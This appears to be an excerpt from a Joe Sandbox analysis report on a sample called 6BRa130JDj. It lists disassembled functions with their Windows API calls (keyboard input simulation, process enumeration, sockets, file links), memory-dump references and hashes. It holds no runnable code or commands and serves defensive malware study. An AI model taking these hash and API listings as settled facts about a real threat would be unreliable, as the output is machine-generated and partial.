                                                                                                                    Function 00328093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 003280C3
                                                                                                                    • CoUninitialize.OLE32 ref: 003280CE
                                                                                                                      • Part of subcall function 0030D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0030D5D4
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 003280D9
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003283AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 780911581-0
                                                                                                                    • Opcode ID: 888c124891a792daae980e0f32ae37ff3049af816df077fc1c2f68552b918fbe
                                                                                                                    • Instruction ID: f483bc2cb85b2f4a60001c871e9ce1e4aa4cef1fcc6865f78493a2d970e5dec5
                                                                                                                    • Opcode Fuzzy Hash: 888c124891a792daae980e0f32ae37ff3049af816df077fc1c2f68552b918fbe
                                                                                                                    • Instruction Fuzzy Hash: 2DA168396147119FCB01DF24D881B6AB7E4BF89354F048808FA9A9B3A1CB30EC54CF82
                                                                                                                    Function 0030687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2808897238-0
                                                                                                                    • Opcode ID: 62eea30efb8ee69c3ee9b5f38a31fe37d4d052f43773a56d62b0ef838bbacacb
                                                                                                                    • Instruction ID: 4dba1b980f1c2ac3e26294f2057879da8bdf34b02c205af198393fe424fd5d0a
                                                                                                                    • Opcode Fuzzy Hash: 62eea30efb8ee69c3ee9b5f38a31fe37d4d052f43773a56d62b0ef838bbacacb
                                                                                                                    • Instruction Fuzzy Hash: 9651C2B47113019EDB25AF65D8B2B6AB3E9AF45310F20D81FE596DB6D5DB30D8A08B00
                                                                                                                    Function 003397F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(00F7DDD0,?), ref: 00339863
                                                                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 00339896
                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00339903
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3880355969-0
                                                                                                                    • Opcode ID: 5cf82ff4376a80e64ffb9629c407534a151d33a639f156e4c45a3564c5ae8c89
                                                                                                                    • Instruction ID: b956fe3d02d9c29b1ca1ffe15a26f3da66a07969ac4258ee44d00ff97efe0822
                                                                                                                    • Opcode Fuzzy Hash: 5cf82ff4376a80e64ffb9629c407534a151d33a639f156e4c45a3564c5ae8c89
                                                                                                                    • Instruction Fuzzy Hash: 03514E34A00209EFDB26CF14C8C0BAE7BB5FF85360F15825AF8559B2A0D770AD81CB90
                                                                                                                    Function 00309A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00309AD2
                                                                                                                    • __itow.LIBCMT ref: 00309B03
                                                                                                                      • Part of subcall function 00309D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00309DBE
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00309B6C
                                                                                                                    • __itow.LIBCMT ref: 00309BC3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3379773720-0
                                                                                                                    • Opcode ID: f756e56373c3c854c793c3657e62b0c4e36d33973902fd989261e25bf50fb88e
                                                                                                                    • Instruction ID: e471bcce38326c26469ff779afd580af0b4d57178d7244befd6f7c7707510ef7
                                                                                                                    • Opcode Fuzzy Hash: f756e56373c3c854c793c3657e62b0c4e36d33973902fd989261e25bf50fb88e
                                                                                                                    • Instruction Fuzzy Hash: 6C417270A00208ABDF16EF54D855BEE7BB9EF44764F00005AF905A7292DB709954CBA1
                                                                                                                    Function 003269AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 003269D1
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003269E1
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00326A45
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00326A51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2214342067-0
                                                                                                                    • Opcode ID: b5be7d98d1f612ed5c0271f7e6173c642b926483065d0e6b3c7a879390748493
                                                                                                                    • Instruction ID: e1fd78c9f14fce020713eda3110e0fa329094593ad3b4d4ccabf84b7297b2cb3
                                                                                                                    • Opcode Fuzzy Hash: b5be7d98d1f612ed5c0271f7e6173c642b926483065d0e6b3c7a879390748493
                                                                                                                    • Instruction Fuzzy Hash: BD41C174700200AFEB25AF24DC87F7A77A8AF05B54F44C418FA19AF2D2DA709D50CB91
                                                                                                                    Function 0032641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0033F910), ref: 003264A7
                                                                                                                    • _strlen.LIBCMT ref: 003264D9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4218353326-0
                                                                                                                    • Opcode ID: 3572dcc83669455dfba112ee5449c2bd796237c7a9ab7142a77870f58c89c444
                                                                                                                    • Instruction ID: dc6b3938dc1be3ec6179b3d51f0cef34cf927df6fa4efc7da963f81c57d19ce9
                                                                                                                    • Opcode Fuzzy Hash: 3572dcc83669455dfba112ee5449c2bd796237c7a9ab7142a77870f58c89c444
                                                                                                                    • Instruction Fuzzy Hash: CE41A431A04114AFCB15FBA8ECD6FEEB7B9AF05310F148155F91A9B292DB30AD50CB50
                                                                                                                    Function 0031B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0031B89E
                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0031B8C4
                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0031B8E9
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0031B915
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    • Opcode ID: 27e425ffae12ba6003dceb149a8aaf35b7155fe15ec37b7a2a2e06df045b4d76
                                                                                                                    • Instruction ID: a6ee2a7d814a0478b02469ab1ca3c3ab30874f5dfee1a656307224ef59152030
                                                                                                                    • Opcode Fuzzy Hash: 27e425ffae12ba6003dceb149a8aaf35b7155fe15ec37b7a2a2e06df045b4d76
                                                                                                                    • Instruction Fuzzy Hash: FE410639A00650DFCB15EF15C484A99BBF5AF4A750F09C098ED4A9B362CB30FD91CB91
                                                                                                                    Function 00338851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003388DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 634782764-0
                                                                                                                    • Opcode ID: db5be1553c5c5e4169eaaa2129fec200e365b9bfe146846af667c89ea74a329c
                                                                                                                    • Instruction ID: bc2d6e6d1e1a6e9da74be89f95888392a642dd42e9a1a16b506b2d82caff37d3
                                                                                                                    • Opcode Fuzzy Hash: db5be1553c5c5e4169eaaa2129fec200e365b9bfe146846af667c89ea74a329c
                                                                                                                    • Instruction Fuzzy Hash: 7531F234600308BFEB279F28CCC5FB877A8EB09310FA54512FA15EA1A1CF71E9409B52
                                                                                                                    Function 0033AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0033AB60
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0033ABD6
                                                                                                                    • PtInRect.USER32(?,?,0033C014), ref: 0033ABE6
                                                                                                                    • MessageBeep.USER32(00000000), ref: 0033AC57
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    • Opcode ID: 980b07ea29153262290195a49a836e015ea2d5f124eb6b0e7a066a68aa7a95a0
                                                                                                                    • Instruction ID: db27d1b3cb34172f5020e03980a9c201f147ed7e094c60c93606c15c44dd1067
                                                                                                                    • Opcode Fuzzy Hash: 980b07ea29153262290195a49a836e015ea2d5f124eb6b0e7a066a68aa7a95a0
                                                                                                                    • Instruction Fuzzy Hash: EA416F30A00919EFCF27DF58D8C4A59BBF9FB49310F1991A9E499DB261D730A841CB92
                                                                                                                    Function 00310AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00310B27
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00310B43
                                                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00310BA9
                                                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00310BFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: 1aba60d6bdb5285eacce567192cd598dfb2378cdc81c1184ff5b1ae0ad603ec9
                                                                                                                    • Instruction ID: 7796fa4ebee8d6f322f851b8bb94b172bb74735c2217c94af7f3bf20cbb62e05
                                                                                                                    • Opcode Fuzzy Hash: 1aba60d6bdb5285eacce567192cd598dfb2378cdc81c1184ff5b1ae0ad603ec9
                                                                                                                    • Instruction Fuzzy Hash: 4A313770D48208AEFB3F8A258C05BFABBA9AB4D318F44825AE491561D1C3F5C9C09751
                                                                                                                    Function 00310C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00310C66
                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00310C82
                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00310CE1
                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00310D33
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: ac7600424243fd4e185b2dd70c3166b79a27a14f64d3fd545147aa938df48fa4
                                                                                                                    • Instruction ID: 6186329c21bbd67577b03693839feb46e9f1b828e8925a3b16c2c0595a07c24a
                                                                                                                    • Opcode Fuzzy Hash: ac7600424243fd4e185b2dd70c3166b79a27a14f64d3fd545147aa938df48fa4
                                                                                                                    • Instruction Fuzzy Hash: AB315830940308AEFF3F8B689C15BFEBB6AAB4D310F04432AE4905A5D1C3B599D58BD1
                                                                                                                    Function 002E61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002E61FB
                                                                                                                    • __isleadbyte_l.LIBCMT ref: 002E6229
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002E6257
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002E628D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3058430110-0
                                                                                                                    • Opcode ID: 445c540a1247101fa43a1002e5c059249e325ec5903dec2c5f9153f53b78895b
                                                                                                                    • Instruction ID: 45bba755c19babc3da5a5d900731ece9aefbff95799e0cac0a440ce5ee362de0
                                                                                                                    • Opcode Fuzzy Hash: 445c540a1247101fa43a1002e5c059249e325ec5903dec2c5f9153f53b78895b
                                                                                                                    • Instruction Fuzzy Hash: 6131F230A50286AFDF228F76CC48BAA7FA9FF51390F554029E9248B191D771EC60DB90
                                                                                                                    Function 00334EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 00334F02
                                                                                                                      • Part of subcall function 00313641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0031365B
                                                                                                                      • Part of subcall function 00313641: GetCurrentThreadId.KERNEL32 ref: 00313662
                                                                                                                      • Part of subcall function 00313641: AttachThreadInput.USER32(00000000,?,00315005), ref: 00313669
                                                                                                                    • GetCaretPos.USER32(?), ref: 00334F13
                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00334F4E
                                                                                                                    • GetForegroundWindow.USER32 ref: 00334F54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2759813231-0
                                                                                                                    • Opcode ID: 0861418563609ada1d1d6727b8eea4ac762015a7d105c6abc9cd16329f111fe8
                                                                                                                    • Instruction ID: a6dc79fc382eb5e4fb24a382c9999a474a15eeb6245c5b0c3246e38f7671bae7
                                                                                                                    • Opcode Fuzzy Hash: 0861418563609ada1d1d6727b8eea4ac762015a7d105c6abc9cd16329f111fe8
                                                                                                                    • Instruction Fuzzy Hash: 6F311872E00108AFDB01EFA5C8859EEB7FDEF99300F10406AE515E7251DA75AE55CBA0
                                                                                                                    Function 00313C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00313C7A
                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00313C88
                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00313CA8
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00313D52
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 420147892-0
                                                                                                                    • Opcode ID: 6693656df0e02576e974bbd82a8244a46d25b93d726726525e79410d2dfd92c4
                                                                                                                    • Instruction ID: e1ab7102b5312fdd17d500e175569542cc7ada2f14aa50d638d8328b5e8e208d
                                                                                                                    • Opcode Fuzzy Hash: 6693656df0e02576e974bbd82a8244a46d25b93d726726525e79410d2dfd92c4
                                                                                                                    • Instruction Fuzzy Hash: 0731B4711083059FD305EF60D881AFFBBE8EF99354F50092DF481861A1EB719A49CB92
                                                                                                                    Function 0033C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • GetCursorPos.USER32(?), ref: 0033C4D2
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,002EB9AB,?,?,?,?,?), ref: 0033C4E7
                                                                                                                    • GetCursorPos.USER32(?), ref: 0033C534
                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,002EB9AB,?,?,?), ref: 0033C56E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
